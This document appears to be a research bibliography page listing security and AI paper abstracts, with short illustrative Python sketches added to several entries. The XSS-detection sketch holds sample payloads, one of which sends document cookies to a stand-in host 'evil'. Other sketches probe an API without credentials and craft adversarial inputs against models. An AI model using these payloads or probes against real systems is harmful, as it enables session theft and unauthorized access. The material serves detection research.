Biblio

Found 431 results

Filters: Keyword is Task Analysis
2021-02-22
Martinelli, F., Marulli, F., Mercaldo, F., Marrone, S., Santone, A..  2020.  Enhanced Privacy and Data Protection using Natural Language Processing and Artificial Intelligence. 2020 International Joint Conference on Neural Networks (IJCNN). :1–8.

Artificial Intelligence systems have enabled significant benefits for users and society, but as the data that feed them keep increasing, so does the exposure to privacy and security leaks. The severity of threats to the right to privacy has obliged governments to enact specific regulations to ensure privacy preservation in any kind of transaction involving sensitive information. In the case of digital and/or physical documents comprising sensitive information, the right to privacy can be preserved by data obfuscation procedures. The capability of recognizing sensitive information for obfuscation is typically entrusted to the experience of human experts, who are overwhelmed by the ever increasing amount of documents to process. Artificial intelligence could proficiently mitigate the effort of the human officers and speed up processes. However, until enough knowledge is available in a machine-readable format, automatic and effectively working systems cannot be developed. In this work we propose a methodology for transferring and leveraging general knowledge across domain-specific tasks. We built, from scratch, domain-specific knowledge data sets for training artificial intelligence models that support human experts in privacy-preserving tasks. We exploited a mixture of natural language processing techniques applied to unlabeled domain-specific document corpora to automatically obtain labeled documents, in which sensitive information is recognized and tagged. We performed preliminary tests on just over 10,000 documents from the healthcare and justice domains. Human experts supported us during the validation. The results we obtained, estimated in terms of precision, recall and F1-score across these two domains, were promising and encouraged further investigation.
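
The paper does not ship its labeling pipeline, but the core idea (automatically recognizing and tagging sensitive entities so they can be obfuscated) can be illustrated with an off-the-shelf NER model. A minimal sketch, assuming spaCy's general-purpose `en_core_web_sm` model and an illustrative set of sensitive entity types, neither of which comes from the paper:

```python
# Minimal sketch: tag and obfuscate sensitive entities with an
# off-the-shelf NER model (spaCy). The entity types and masking
# rule below are illustrative assumptions, not the paper's pipeline.
import spacy

nlp = spacy.load("en_core_web_sm")  # assumed general-purpose model

SENSITIVE = {"PERSON", "GPE", "ORG", "DATE"}  # assumed sensitive types

def obfuscate(text: str) -> str:
    doc = nlp(text)
    out, last = [], 0
    for ent in doc.ents:
        if ent.label_ in SENSITIVE:
            out.append(text[last:ent.start_char])
            out.append(f"[{ent.label_}]")  # replace the span with its tag
            last = ent.end_char
    out.append(text[last:])
    return "".join(out)

print(obfuscate("John Smith was admitted to Mercy Hospital on 3 May 2019."))
```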

2021-02-10
Kascheev, S., Olenchikova, T..  2020.  The Detecting Cross-Site Scripting (XSS) Using Machine Learning Methods. 2020 Global Smart Industry Conference (GloSIC). :265–270.
This article discusses the problem of detecting cross-site scripting (XSS) using machine learning methods. XSS is an attack in which malicious code is embedded in a page to interact with an attacker's web server. The XSS attack ranks third among the key web application risks according to the Open Web Application Security Project (OWASP). For a long time this attack was not studied, as it was considered harmless. However, this is fallacious: the page or HTTP cookie may contain highly sensitive data, such as payment document numbers or the administrator's session token. Machine learning is a tool that can be used to detect XSS attacks. This article describes an experiment as a result of which a model for detecting XSS attacks was created. The following machine learning algorithms are considered: the support vector machine, the decision tree, the Naive Bayes classifier, and logistic regression. The accuracy of the presented methods is compared.
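
The paper does not include its experimental code; a minimal sketch of the comparison it describes, using scikit-learn versions of the four classifiers over character n-gram features (the feature choice and the tiny inline dataset are illustrative assumptions):

```python
# Minimal sketch: train the four classifiers the paper considers on
# labeled request strings and compare their accuracy.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import MultinomialNB
from sklearn.svm import LinearSVC
from sklearn.tree import DecisionTreeClassifier

samples = [
    "<script>document.location='http://evil/'+document.cookie</script>",
    "<img src=x onerror=alert(1)>",
    "home.html?page=3",
    "search?q=blue+shoes",
]
labels = [1, 1, 0, 0]  # 1 = XSS payload, 0 = benign

X = TfidfVectorizer(analyzer="char", ngram_range=(2, 4)).fit_transform(samples)

for clf in (LinearSVC(), DecisionTreeClassifier(), MultinomialNB(), LogisticRegression()):
    scores = cross_val_score(clf, X, labels, cv=2)
    print(type(clf).__name__, scores.mean())
```
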
Gomes, G., Dias, L., Correia, M..  2020.  CryingJackpot: Network Flows and Performance Counters against Cryptojacking. 2020 IEEE 19th International Symposium on Network Computing and Applications (NCA). :1–10.
Cryptojacking, the appropriation of users' computational resources without their knowledge or consent to obtain cryptocurrencies, is a widespread attack, relatively easy to implement and hard to detect. Either browser-based or binary, cryptojacking lacks robust and reliable detection solutions. This paper presents a hybrid approach to detect cryptojacking where no previous knowledge about the attacks or training data is needed. Our Cryptojacking Intrusion Detection Approach, CryingJackpot, extracts and combines flow and performance counter-based features, aggregating hosts with similar behavior by using unsupervised machine learning algorithms. We evaluate CryingJackpot experimentally with both an artificial and a hybrid dataset, achieving F1-scores up to 97%.
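
As a rough illustration of the unsupervised stage described above, clustering hosts by combined flow and performance counter features (the feature columns, values, and choice of KMeans are illustrative assumptions, not the paper's exact pipeline):

```python
# Minimal sketch: aggregate per-host features (flow statistics plus
# performance counters) and cluster hosts with similar behavior.
import numpy as np
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler

# rows: hosts; columns: [avg flow bytes, flows/min, avg CPU %, cache misses/s]
hosts = np.array([
    [1200.0,  3.0, 12.0, 1.0e5],
    [1100.0,  4.0, 10.0, 1.2e5],
    [ 300.0, 40.0, 97.0, 9.0e6],   # persistent high CPU: cryptojacking-like
    [ 250.0, 35.0, 95.0, 8.5e6],
])

X = StandardScaler().fit_transform(hosts)
labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(X)
print(labels)  # hosts grouped by behavior; the anomalous cluster is inspected
```
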
2021-02-08
Nikouei, S. Y., Chen, Y., Faughnan, T. R..  2018.  Smart Surveillance as an Edge Service for Real-Time Human Detection and Tracking. 2018 IEEE/ACM Symposium on Edge Computing (SEC). :336–337.

Monitoring for security and well-being in highly populated areas is a critical issue for city administrators, policy makers and urban planners. As an essential part of many dynamic and critical data-driven tasks, situational awareness (SAW) provides decision-makers deeper insight into the meaning of urban surveillance. Thus, surveillance measures are increasingly needed. However, traditional surveillance platforms are not scalable when more cameras are added to the network. In this work, smart surveillance as an edge service is proposed. To accomplish the object detection, identification, and tracking tasks at the edge-fog layers, two novel lightweight algorithms are proposed, for detection and tracking respectively. A prototype has been built to validate the feasibility of the idea, and the test results are very encouraging.

Haque, M. A., Shetty, S., Kamhoua, C. A., Gold, K..  2020.  Integrating Mission-Centric Impact Assessment to Operational Resiliency in Cyber-Physical Systems. GLOBECOM 2020 - 2020 IEEE Global Communications Conference. :1–7.

Developing mission-centric impact assessment techniques to address cyber resiliency in cyber-physical systems (CPSs) requires integrating system interdependencies into the risk and resilience analysis process. Network administrators generally use attack graphs to estimate possible consequences in a networked environment, but attack graphs fail to incorporate operations-specific dependencies. Localizing the dependencies among operational missions, tasks, and the hosting devices in a large-scale CPS is also challenging. In this work, we offer a graphical modeling technique that integrates the mission-centric impact assessment of cyberattacks with operational resiliency by combining a logical attack graph with a mission impact propagation graph. We propose formal techniques to compute a cyberattack's impact on the operational mission and offer an optimization process to minimize that impact under budgetary restrictions. We also relate the impact to the system's functional operability. We illustrate our modeling techniques using a SCADA (supervisory control and data acquisition) case study for cyber-physical power systems. We believe our proposed method will help evaluate and minimize the impact of cyberattacks on a CPS's operational missions and thus enhance cyber resiliency.
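
A minimal sketch of the impact propagation idea, assuming a toy dependency graph (host to task to mission), edge weights, and a max-propagation rule; none of these specifics come from the paper's formal model:

```python
# Minimal sketch: propagate the impact of a compromised host up a
# mission dependency graph (host -> task -> mission).
import networkx as nx

G = nx.DiGraph()
G.add_edge("host:rtu1", "task:telemetry", weight=0.9)
G.add_edge("host:hmi1", "task:operator_view", weight=0.8)
G.add_edge("task:telemetry", "mission:grid_monitoring", weight=1.0)
G.add_edge("task:operator_view", "mission:grid_monitoring", weight=0.6)

impact = {n: 0.0 for n in G}
impact["host:rtu1"] = 1.0  # the attack graph says this host is compromised

for node in nx.topological_sort(G):
    for succ in G.successors(node):
        w = G[node][succ]["weight"]
        impact[succ] = max(impact[succ], impact[node] * w)

print(impact["mission:grid_monitoring"])  # 0.9: mission impact of the compromise
```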

2021-02-03
Rabby, M. K. Monir, Khan, M. Altaf, Karimoddini, A., Jiang, S. X..  2020.  Modeling of Trust Within a Human-Robot Collaboration Framework. 2020 IEEE International Conference on Systems, Man, and Cybernetics (SMC). :4267–4272.

In this paper, a time-driven performance-aware mathematical model for trust in the robot is proposed for a Human-Robot Collaboration (HRC) framework. The proposed trust model is based on both the human operator and the robot performances. The human operator’s performance is modeled based on both the physical and cognitive performances, while the robot performance is modeled over its unpredictable, predictable, dependable, and faithful operation regions. The model is validated via different simulation scenarios. The simulation results show that the trust in the robot in the HRC framework is governed by robot performance and human operator’s performance and can be improved by enhancing the robot performance.

Xu, J., Howard, A..  2020.  How much do you Trust your Self-Driving Car? Exploring Human-Robot Trust in High-Risk Scenarios. 2020 IEEE International Conference on Systems, Man, and Cybernetics (SMC). :4273–4280.

Trust is an important characteristic of successful interactions between humans and agents in many scenarios. Self-driving scenarios are of particular relevance when discussing the issue of trust due to the high-risk nature of erroneous decisions being made. The present study aims to investigate decision-making and aspects of trust in a realistic driving scenario in which an autonomous agent provides guidance to humans. To this end, a simulated driving environment based on a college campus was developed and presented. An online and an in-person experiment were conducted to examine the impacts of mistakes made by the self-driving AI agent on participants’ decisions and trust. During the experiments, participants were asked to complete a series of driving tasks and make a sequence of decisions in a time-limited situation. Behavior analysis indicated a similar relative trend in the decisions across these two experiments. Survey results revealed that a mistake made by the self-driving AI agent at the beginning had a significant impact on participants’ trust. In addition, similar overall experience and feelings across the two experimental conditions were reported. The findings in this study add to our understanding of trust in human-robot interaction scenarios and provide valuable insights for future research work in the field of human-robot trust.

Alarcon, G. M., Gibson, A. M., Jessup, S. A..  2020.  Trust Repair in Performance, Process, and Purpose Factors of Human-Robot Trust. 2020 IEEE International Conference on Human-Machine Systems (ICHMS). :1–6.

The current study explored the influence of trust and distrust behaviors on performance, process, and purpose (trustworthiness) perceptions over time when participants were paired with a robot partner. We examined the changes in trustworthiness perceptions after trust violations and trust repair after those violations. Results indicated performance, process, and purpose perceptions were all affected by trust violations, but perceptions of process and purpose decreased more than performance following a distrust behavior. Similarly, trust repair was achieved in performance perceptions, but trust repair in perceived process and purpose was absent. When a trust violation occurred, process and purpose perceptions deteriorated and failed to recover from the violation. In addition, the trust violation resulted in untrustworthy perceptions of the robot. In contrast, trust violations decreased partner performance perceptions, and subsequent trust behaviors resulted in a trust repair. These findings suggest that people are more sensitive to distrust behaviors in their perceptions of process and purpose than they are in performance perceptions.

2021-02-01
Wu, L., Chen, X., Meng, L., Meng, X..  2020.  Multitask Adversarial Learning for Chinese Font Style Transfer. 2020 International Joint Conference on Neural Networks (IJCNN). :1–8.
Style transfer between Chinese fonts is challenging due to both the complexity of Chinese characters and the significant difference between fonts. Existing algorithms for this task typically learn a mapping between the reference and target fonts for each character. Subsequently, this mapping is used to generate the characters that do not exist in the target font. However, the characters available for training are unlikely to cover all fine-grained parts of the missing characters, leading to an overfitting problem. As a result, the generated characters of the target font may suffer from problems such as incomplete or incorrect radicals and dirty dots. To address this problem, this paper presents a multi-task adversarial learning approach, termed MTfontGAN, to generate more vivid Chinese characters. MTfontGAN learns to transfer a reference font to multiple target ones simultaneously. An alignment is imposed on the encoders of different tasks to make them focus on the important parts of the characters in general style transfer. Such cross-task interactions at the feature level effectively improve the generalization capability of MTfontGAN. The performance of MTfontGAN is evaluated on three Chinese font datasets. Experimental results show that MTfontGAN outperforms the state-of-the-art algorithms in a single-task setting. More importantly, increasing the number of tasks leads to better performance in all of them.
Wang, H., Li, Y., Wang, Y., Hu, H., Yang, M.-H..  2020.  Collaborative Distillation for Ultra-Resolution Universal Style Transfer. 2020 IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR). :1857–1866.
Universal style transfer methods typically leverage rich representations from deep Convolutional Neural Network (CNN) models (e.g., VGG-19) pre-trained on large collections of images. Despite the effectiveness, its application is heavily constrained by the large model size to handle ultra-resolution images given limited memory. In this work, we present a new knowledge distillation method (named Collaborative Distillation) for encoder-decoder based neural style transfer to reduce the convolutional filters. The main idea is underpinned by a finding that the encoder-decoder pairs construct an exclusive collaborative relationship, which is regarded as a new kind of knowledge for style transfer models. Moreover, to overcome the feature size mismatch when applying collaborative distillation, a linear embedding loss is introduced to drive the student network to learn a linear embedding of the teacher's features. Extensive experiments show the effectiveness of our method when applied to different universal style transfer approaches (WCT and AdaIN), even if the model size is reduced by 15.5 times. Especially, on WCT with the compressed models, we achieve ultra-resolution (over 40 megapixels) universal style transfer on a 12GB GPU for the first time. Further experiments on optimization-based stylization scheme show the generality of our algorithm on different stylization paradigms. Our code and trained models are available at https://github.com/mingsun-tse/collaborative-distillation.
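
A minimal sketch of the linear embedding loss described above, in PyTorch: a learned linear map (a 1x1 convolution) bridges the channel mismatch and drives the slimmed student's features toward the teacher's. The channel sizes and encoder stubs are illustrative assumptions:

```python
# Minimal sketch: a learned linear embedding aligns the smaller
# student's features with the teacher's feature space.
import torch
import torch.nn as nn

teacher_feat = torch.randn(1, 512, 32, 32)   # e.g. a VGG-19 relu4_1 feature map
student = nn.Conv2d(3, 128, 3, padding=1)    # slimmed student encoder stub
embed = nn.Conv2d(128, 512, 1)               # 1x1 conv = per-pixel linear map

image = torch.randn(1, 3, 32, 32)
student_feat = student(image)

# the channel-count mismatch is bridged by the linear embedding
loss = nn.functional.mse_loss(embed(student_feat), teacher_feat)
loss.backward()
print(loss.item())
```
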
Han, W., Schulz, H.-J..  2020.  Beyond Trust Building — Calibrating Trust in Visual Analytics. 2020 IEEE Workshop on TRust and EXpertise in Visual Analytics (TREX). :9–15.
Trust is a fundamental factor in how users engage in interactions with Visual Analytics (VA) systems. While the importance of building trust to this end has been pointed out in research, the aspect that trust can also be misplaced is largely ignored in VA so far. This position paper addresses this aspect by putting trust calibration in focus – i.e., the process of aligning the user’s trust with the actual trustworthiness of the VA system. To this end, we present the trust continuum in the context of VA, dissect important trust issues in both VA systems and users, as well as discuss possible approaches that can build and calibrate trust.
Papadopoulos, A. V., Esterle, L..  2020.  Situational Trust in Self-aware Collaborating Systems. 2020 IEEE International Conference on Autonomic Computing and Self-Organizing Systems Companion (ACSOS-C). :91–94.
Trust among humans affects the way we interact with each other. In autonomous systems, this trust is often predefined and hard-coded before the systems are deployed. However, when systems encounter unfolding situations, requiring them to interact with others, a notion of trust will be inevitable. In this paper, we discuss trust as a fundamental measure to enable an autonomous system to decide whether or not to interact with another system, whether biological or artificial. These decisions become increasingly important when continuously integrating with others during runtime.
Hou, M..  2020.  IMPACT: A Trust Model for Human-Agent Teaming. 2020 IEEE International Conference on Human-Machine Systems (ICHMS). :1–4.
A trust model, IMPACT: Intention, Measurability, Predictability, Agility, Communication, and Transparency, has been conceptualized to build human trust in autonomous agents. These six critical characteristics must be exhibited by the agents in order to gain and maintain the trust of their human partners towards an effective and collaborative team in achieving common goals. The IMPACT model guided the design of an intelligent adaptive decision aid for dynamic target engagement processes in a military context. Positive feedback from subject matter experts who participated in a large-scale joint exercise controlling multiple unmanned vehicles indicated the effectiveness of the decision aid. It also demonstrated the utility of the IMPACT model as a set of design principles for building trusted human-agent teaming.
Gupta, K., Hajika, R., Pai, Y. S., Duenser, A., Lochner, M., Billinghurst, M..  2020.  Measuring Human Trust in a Virtual Assistant using Physiological Sensing in Virtual Reality. 2020 IEEE Conference on Virtual Reality and 3D User Interfaces (VR). :756–765.
With the advancement of Artificial Intelligence technology to make smart devices, understanding how humans develop trust in virtual agents is emerging as a critical research field. Through our research, we report on a novel methodology to investigate users' trust in auditory assistance in a Virtual Reality (VR) based search task, under both high and low cognitive load and under varying levels of agent accuracy. We collected physiological sensor data such as electroencephalography (EEG), galvanic skin response (GSR), and heart-rate variability (HRV); subjective data through questionnaires such as the System Trust Scale (STS), Subjective Mental Effort Questionnaire (SMEQ) and NASA-TLX; and a behavioral measure of trust (congruency of users' head motion in response to valid/invalid verbal advice from the agent). Our results indicate that our custom VR environment enables researchers to measure and understand human trust in virtual agents using these metrics, and that both cognitive load and agent accuracy play an important role in trust formation. We discuss the implications of the research and directions for future work.
Lee, J., Abe, G., Sato, K., Itoh, M..  2020.  Impacts of System Transparency and System Failure on Driver Trust During Partially Automated Driving. 2020 IEEE International Conference on Human-Machine Systems (ICHMS). :1–3.
The objective of this study is to explore changes of trust in a situation where drivers need to intervene. Trust in automation is a key determinant of appropriate interaction between drivers and the system. System transparency and the type of system failure influence how trust is shaped in supervisory control. Subjective ratings of trust were collected to examine the impact of two factors, system transparency (Detailed vs. Less) and system failure (by Limits vs. Malfunction), in a driving simulator study in which drivers experienced a partially automated vehicle. We examined trust ratings at three points: before and after driver intervention in the automated vehicle, and after subsequent experience of flawless automated driving. Our results found that system transparency did not have a significant impact on trust change from before to after the intervention. System malfunction led to a reduction in trust compared to before the intervention, whilst system limits did not influence trust. The subsequent experience recovered the decreased trust; in addition, when the system limit occurred to drivers who had detailed information about the system, trust increased in spite of the intervention. The present findings have implications for automation design to achieve an appropriate level of trust.
2021-01-28
Romashchenko, V., Brutscheck, M., Chmielewski, I..  2020.  Organisation and Implementation of ResNet Face Recognition Architectures in the Environment of Zigbee-based Data Transmission Protocol. 2020 Fourth International Conference on Multimedia Computing, Networking and Applications (MCNA). :25–30.

This paper describes a realisation of a ResNet face recognition method over a Zigbee-based wireless protocol. The system uses a CC2530 Zigbee-based radio frequency chip with a VC0706 camera connected to it. An Arduino Nano is used for organising data compression and effective division of Zigbee packets. The proposed solution also simplifies data transmission within the strict bandwidth of the Zigbee protocol and provides reliable packet forwarding in case of frequency distortion. The investigated model uses a Raspberry Pi 3 with a connected Zigbee End Device (ZED) for successful reception of the images and acceleration of the deep learning inference. The model is integrated into a smart security system based on Zigbee modules, a MySQL database and an Android application, and works in the background using daemon procedures. To protect data, all wireless connections are encrypted with the 128-bit Advanced Encryption Standard (AES-128) algorithm. Experimental results show the possibility of implementing complex systems under the restricted requirements of available transmission protocols.
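
A minimal sketch of the AES-128 link encryption mentioned above, using the `cryptography` package. The choice of CTR mode, the key handling, and the packet framing are illustrative assumptions, not the system's actual Zigbee security configuration (Zigbee networks typically use AES-CCM at the MAC layer):

```python
# Minimal sketch: AES-128 encryption of one image fragment before it is
# split into Zigbee frames. Mode, key handling, and framing are assumed.
import os

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(16)     # 128-bit key shared by the Zigbee nodes
nonce = os.urandom(16)   # per-packet nonce, sent alongside the ciphertext

def encrypt_packet(payload: bytes) -> bytes:
    enc = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
    return enc.update(payload) + enc.finalize()

def decrypt_packet(ct: bytes) -> bytes:
    dec = Cipher(algorithms.AES(key), modes.CTR(nonce)).decryptor()
    return dec.update(ct) + dec.finalize()

chunk = b"\xff\xd8\xff"  # placeholder for one JPEG fragment
assert decrypt_packet(encrypt_packet(chunk)) == chunk
```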

He, H. Y., Yang, Z. Guo, Chen, X. N..  2020.  PERT: Payload Encoding Representation from Transformer for Encrypted Traffic Classification. 2020 ITU Kaleidoscope: Industry-Driven Digital Transformation (ITU K). :1–8.

Traffic identification is becoming more important yet more challenging as encryption techniques develop rapidly. In contrast to recent deep learning methods that apply image processing to such encrypted traffic problems, in this paper we propose a method named Payload Encoding Representation from Transformer (PERT) to perform automatic traffic feature extraction using a state-of-the-art dynamic word embedding technique. Based on this, we further provide a traffic classification framework in which unlabeled traffic is utilized to pre-train an encoding network that learns the contextual distribution of traffic payload bytes. The downstream classification then reuses the pre-trained network to obtain an enhanced classification result. Through experiments on a public encrypted traffic data set and our captured Android HTTPS traffic, we show that the proposed method achieves clearly better effectiveness than the compared baselines. To the best of our knowledge, this is the first time encrypted traffic classification has been addressed with dynamic word embedding along with its pre-training strategy.
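
A minimal sketch of the first step the paper describes, turning raw payload bytes into token sequences that a BERT-style encoder can pre-train on. The byte-pair tokenization scheme below is an illustrative assumption, not necessarily PERT's exact encoding:

```python
# Minimal sketch: encode raw payload bytes as token ids for masked-token
# pre-training. Consecutive byte pairs become one token in [0, 65536).
def payload_to_tokens(payload: bytes, max_len: int = 128) -> list[int]:
    return [
        payload[i] << 8 | payload[i + 1]
        for i in range(0, min(len(payload), 2 * max_len) - 1, 2)
    ]

pkt = bytes.fromhex("1603030045010000410303")  # start of a TLS ClientHello
print(payload_to_tokens(pkt))
# these sequences feed masked-token pre-training on unlabeled traffic;
# a classifier head is then fine-tuned on the labeled set
```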

Seiler, M., Trautmann, H., Kerschke, P..  2020.  Enhancing Resilience of Deep Learning Networks By Means of Transferable Adversaries. 2020 International Joint Conference on Neural Networks (IJCNN). :1–8.

Artificial neural networks in general, and deep learning networks in particular, have established themselves as popular and powerful machine learning algorithms. While the often tremendous sizes of these networks are beneficial when solving complex tasks, the tremendous number of parameters also causes such networks to be vulnerable to malicious behavior such as adversarial perturbations. These perturbations can change a model's classification decision. Moreover, while single-step adversaries can easily be transferred from network to network, the transfer of more powerful multi-step adversaries has usually been rather difficult. In this work, we introduce a method for generating strong adversaries that can easily (and frequently) be transferred between different models. This method is then used to generate a large set of adversaries, based on which the effects of selected defense methods are experimentally assessed. Finally, we introduce a novel, simple, yet effective approach to enhance the resilience of neural networks against adversaries and benchmark it against established defense methods. In contrast to existing methods, our proposed defense approach is much more efficient, as it only requires a single additional forward-pass to achieve comparable performance results.
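
For context, a minimal sketch of a single-step adversary of the kind discussed above (FGSM-style), whose transferability between models is the paper's starting point. The toy classifier and epsilon are illustrative assumptions:

```python
# Minimal sketch: craft a single-step adversarial perturbation by
# following the sign of the input gradient.
import torch
import torch.nn as nn

model = nn.Sequential(nn.Flatten(), nn.Linear(28 * 28, 10))  # toy classifier
x = torch.rand(1, 1, 28, 28, requires_grad=True)
y = torch.tensor([3])

loss = nn.functional.cross_entropy(model(x), y)
loss.backward()

eps = 0.1
x_adv = (x + eps * x.grad.sign()).clamp(0, 1).detach()
# x_adv can now be fed to a *different* model to test transferability
print((x_adv - x).abs().max().item())
```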

2021-01-25
Chen, J., Lin, X., Shi, Z., Liu, Y..  2020.  Link Prediction Adversarial Attack Via Iterative Gradient Attack. IEEE Transactions on Computational Social Systems. 7:1081–1094.
Deep neural networks are increasingly applied to graph-related tasks, such as node classification and link prediction. However, the vulnerability of deep models can be revealed using carefully crafted adversarial examples generated by various adversarial attack methods. To explore this security problem, we define the link prediction adversarial attack problem and put forward a novel iterative gradient attack (IGA) strategy using the gradient information in the trained graph autoencoder (GAE) model. Not surprisingly, GAE can be fooled by an adversarial graph with a few links perturbed on the clean one. Comprehensive experiments on different real-world graphs indicate that most deep models, and even state-of-the-art link prediction algorithms, cannot escape the adversarial attack. The attack can also benefit users as an efficient privacy-protection tool against unwanted link prediction. On the other hand, the adversarial attack serves as a robustness evaluation metric for the defensibility of current link prediction algorithms.
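
A minimal sketch of the gradient-driven link perturbation idea: treat the adjacency matrix as a differentiable input and flip the entry with the largest gradient of the target link's score. The two-hop propagation and dot-product scoring below are stand-ins for a trained GAE, not the paper's exact model:

```python
# Minimal sketch: pick the edge flip that most influences the predicted
# score of a target link, using the adjacency-matrix gradient.
import torch

n = 6
A = torch.eye(n)                           # adjacency with self-loops
A[0, 1] = A[1, 0] = 1.0
A[1, 2] = A[2, 1] = 1.0
A.requires_grad_(True)

X = torch.randn(n, 8)                      # node features
W = torch.randn(8, 8)                      # stand-in for learned GAE weights

Z = A @ torch.relu(A @ X @ W)              # simple two-hop propagation
score = Z[0] @ Z[2]                        # predicted score of target link (0, 2)
score.backward()

grad = A.grad.clone()
grad.fill_diagonal_(0)                     # never flip self-loops
idx = torch.argmax(grad.abs())             # most influential entry to flip
print(divmod(idx.item(), n))               # candidate edge for perturbation
```
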
2021-01-20
Li, Y., Yang, Y., Yu, X., Yang, T., Dong, L., Wang, W..  2020.  IoT-APIScanner: Detecting API Unauthorized Access Vulnerabilities of IoT Platform. 2020 29th International Conference on Computer Communications and Networks (ICCCN). :1–5.

The Internet of Things enables interaction between IoT devices and users through the cloud. The cloud provides services such as account monitoring, device management, and device control. As the center of the IoT platform, the cloud provides services to IoT devices and IoT applications through APIs, so permission verification of these APIs is essential. However, we found that some APIs are unverified, which allows unauthorized users to access cloud resources or control devices; this could threaten the security of both devices and the cloud. To check for unauthorized access to the API, we developed IoT-APIScanner, a framework to check the permission verification of cloud APIs. Through observation, we found there is a large amount of interactive information between IoT applications and the cloud, including the APIs and related parameters, so we can extract them by analyzing the code of the IoT application and use them to mutate API test cases. Through these test cases, we can effectively check the permissions of the API. In our research, we extracted a total of 5 platform APIs. Among them, the proportion of APIs without permission verification reached 13.3%. Our research shows that attackers could use APIs without permission verification to obtain user privacy or control of devices.
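
A minimal sketch of the core check IoT-APIScanner performs: replay an extracted API call with its credential parameters stripped and see whether the cloud still serves the request. The endpoint, parameter names, and token field below are hypothetical:

```python
# Minimal sketch: mutate an extracted API call by removing its credential
# parameters, then compare the response with the authenticated baseline.
import requests

def check_permission(url: str, params: dict, auth_keys=("token", "session")):
    baseline = requests.get(url, params=params, timeout=5)
    mutated = {k: v for k, v in params.items() if k not in auth_keys}
    probe = requests.get(url, params=mutated, timeout=5)
    # if the unauthenticated call still succeeds, verification is missing
    return probe.status_code == 200 and probe.text == baseline.text

vulnerable = check_permission(
    "https://cloud.example.com/api/device/status",   # hypothetical endpoint
    {"device_id": "d42", "token": "abc123"},         # hypothetical parameters
)
print(vulnerable)
```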

Mindermann, K., Wagner, S..  2020.  Fluid Intelligence Doesn't Matter! Effects of Code Examples on the Usability of Crypto APIs. 2020 IEEE/ACM 42nd International Conference on Software Engineering: Companion Proceedings (ICSE-Companion). :306–307.

Context: Programmers frequently look for the code of previously solved problems that they can adapt for their own problem. Despite existing example code on the web, on sites like Stack Overflow, cryptographic Application Programming Interfaces (APIs) are commonly misused. Little is known about what makes examples helpful for developers using crypto APIs. Analogical problem solving is a psychological theory that investigates how people use known solutions to solve new problems. There is evidence that the capacity to reason and solve novel problems, a.k.a. Fluid Intelligence (Gf), and structurally and procedurally similar solutions support problem solving. Aim: Our goal is to understand whether similarity and Gf also have an effect in the context of using cryptographic APIs with the help of code examples. Method: We conducted a controlled experiment with 76 student participants developing with or without procedurally similar examples and with one of two Java crypto libraries, and measured the Gf of the participants as well as the effect on usability (effectiveness, efficiency, satisfaction) and security bugs. Results: We observed a strong effect of code examples with high procedural similarity on all dependent variables. Fluid intelligence (Gf) had no effect. It also made no difference which library the participants used. Conclusions: To have a positive effect in a development task, example code must be highly similar to a concrete solution, rather than abstract and generic.

2021-01-18
Laptiev, O., Shuklin, G., Hohonianc, S., Zidan, A., Salanda, I..  2019.  Dynamic Model of Cyber Defense Diagnostics of Information Systems With The Use of Fuzzy Technologies. 2019 IEEE International Conference on Advanced Trends in Information Theory (ATIT). :116–119.
When building the architecture of cyber defense systems, one of the important tasks is to create a methodology for the ongoing diagnostics of the cybersecurity status of information systems and objects of information activity. The complexity of this procedure lies in the fact that a strong security level at the software level does not mean that the same strength is present at the hardware or cryptographic level. There are always weaknesses at all levels of information security that criminals are constantly looking for. Promptly calculating the likelihood of possible negative consequences from successfully executed cyberattacks is therefore an urgent task today. This paper proposes an approach for instantaneously calculating the probabilities of negative consequences from successful cyberattacks on objects of information activity, on the basis of delay differential equation theory and a mechanism for constructing a logical fuzzy function. This makes it possible to diagnose the security status of the information system.
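
A minimal numerical sketch of the kind of delay differential equation such an approach rests on, where the current probability of negative consequences depends on its own delayed value. The specific equation and coefficients are illustrative assumptions, not the paper's model:

```python
# Minimal sketch: Euler integration of an assumed delay differential
# equation for the probability p(t) of negative consequences,
#   dp/dt = a * p(t - tau) * (1 - p(t)) - b * p(t)
import numpy as np

tau, dt, T = 1.0, 0.01, 10.0
steps, lag = int(T / dt), int(tau / dt)
p = np.zeros(steps)
p[:lag + 1] = 0.05  # history: low baseline probability before the attack

a, b = 0.8, 1.2     # assumed attack-pressure and mitigation coefficients
for t in range(lag, steps - 1):
    dp = a * p[t - lag] * (1.0 - p[t]) - b * p[t]
    p[t + 1] = p[t] + dt * dp

print(p[-1])  # steady-state risk estimate fed to the fuzzy diagnostic layer
```
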
Huitzil, I., Fuentemilla, Á, Bobillo, F..  2020.  I Can Get Some Satisfaction: Fuzzy Ontologies for Partial Agreements in Blockchain Smart Contracts. 2020 IEEE International Conference on Fuzzy Systems (FUZZ-IEEE). :1–8.
This paper proposes a novel extension of blockchain systems with fuzzy ontologies. The main advantage is to let the users have flexible restrictions, represented using fuzzy sets, and to develop smart contracts where there is a partial agreement among the involved parties. We propose a general architecture based on four fuzzy ontologies and a process to develop and run the smart contracts, based on a reduction to a well-known fuzzy ontology reasoning task (Best Satisfiability Degree). We also investigate different operators to compute Pareto-optimal solutions and implement our approach in the Ethereum blockchain.
Naik, N., Jenkins, P., Savage, N., Yang, L., Boongoen, T., Iam-On, N..  2020.  Fuzzy-Import Hashing: A Malware Analysis Approach. 2020 IEEE International Conference on Fuzzy Systems (FUZZ-IEEE). :1–8.
Malware has remained a consistent threat since its emergence, growing into a plethora of types and large numbers. In recent years, numerous new malware variants have enabled the identification of new attack surfaces and vectors, and have become a major challenge to security experts, driving the enhancement and development of new malware analysis techniques to contain the contagion. One of the preliminary steps of malware analysis is to remove the abundance of counterfeit malware samples from the large collection of suspicious samples. This process assists in managing human and machine resources effectively in the analysis of both unknown and likely malware samples. Hashing techniques, such as fuzzy hashing and import hashing, are among the fastest and most efficient techniques for performing this preliminary analysis. However, both hashing methods have their limitations and may not be effective on their own; instead, the combination of the two distinct methods may assist in improving detection accuracy and the overall performance of the analysis. This paper proposes a Fuzzy-Import hashing technique, a combination of fuzzy hashing and import hashing, to improve the detection accuracy and overall performance of malware analysis. The proposed Fuzzy-Import hashing offers several benefits, which are demonstrated through experimentation performed on the collected malware samples and compared against the stand-alone techniques of fuzzy hashing and import hashing.
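
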